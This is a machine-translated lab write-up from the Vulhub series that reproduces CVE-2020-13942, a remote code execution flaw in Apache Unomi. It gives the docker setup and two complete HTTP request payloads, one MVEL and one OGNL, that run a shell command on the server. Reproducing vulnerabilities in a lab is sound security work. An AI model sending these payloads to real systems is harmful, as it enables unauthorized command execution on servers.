Vulhub vulnerability recurrence 71_ Unomi

CVE-2020-13942_ Apache Unomi Remote expression Code Execution Vulnerability

Vulnerability Details

Apache Unomi It's a standard based customer data platform （CDP,Customer Data Platform）, Used to manage information such as online customers and visitors , To provide a personalized experience that meets visitor privacy rules . stay Apache Unomi 1.5.1 In previous versions , There is an expression injection vulnerability , A remote attacker can use MVEL and OGNL Expression can execute any command on the target server .

Reference link ：

-https://www.checkmarx.com/blog/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/

- https://github.com/eugenebmx/CVE-2020-13942

Environment building

shooting range ：192.168.4.10_Ubuntu

Run the following command to start a Apache Unomi 1.5.1 Server for ：

#docker-compose up -d

After the environment starts , adopt `http://your-ip:8181` or `https://your-ip:9443` You can access Unomi Of API.

Loophole recurrence

adopt 8181 and 9443 Both ports can trigger vulnerabilities , The following 8181 For example .

1. adopt MVEL Expressions execute arbitrary commands ：

```

POST /context.json HTTP/1.1

Host: localhost:8181

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

Connection: close

Content-Type: application/json

Content-Length: 483

{

    "filters": [

        {

            "id": "sample",

            "filters": [

                {

                    "condition": {

                         "parameterValues": {

                            "": "script::Runtime r = Runtime.getRuntime(); r.exec(\"touch /tmp/mvel\");"

                        },

                        "type": "profilePropertyCondition"

                    }

                }

            ]

        }

    ],

    "sessionId": "sample"

}

```

2. adopt OGNL Expressions execute arbitrary commands ：

```

POST /context.json HTTP/1.1

Host: localhost:8181

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

Connection: close

Content-Type: application/json

Content-Length: 1064

{

  "personalizations":[

    {

      "id":"gender-test",

      "strategy":"matching-first",

      "strategyOptions":{

        "fallback":"var2"

      },

      "contents":[

        {

          "filters":[

            {

              "condition":{

                "parameterValues":{

                  "propertyName":"(#runtimeclass = #this.getClass().forName(\"java.lang.Runtime\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\"getRuntime\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\"exec\")}.{? #this.getParameters()[0].getType().getName().equals(\"java.lang.String\")}.{? #this.getParameters().length < 2}[0]).(#execmethod.invoke(#rtobj,\"touch /tmp/ognl\"))",

                  "comparisonOperator":"equals",

                  "propertyValue":"male"

                },

                "type":"profilePropertyCondition"

              }

            }

          ]

        }

      ]

    }

  ],

  "sessionId":"sample"

}

```

  Into the container , Visible command executed successfully ：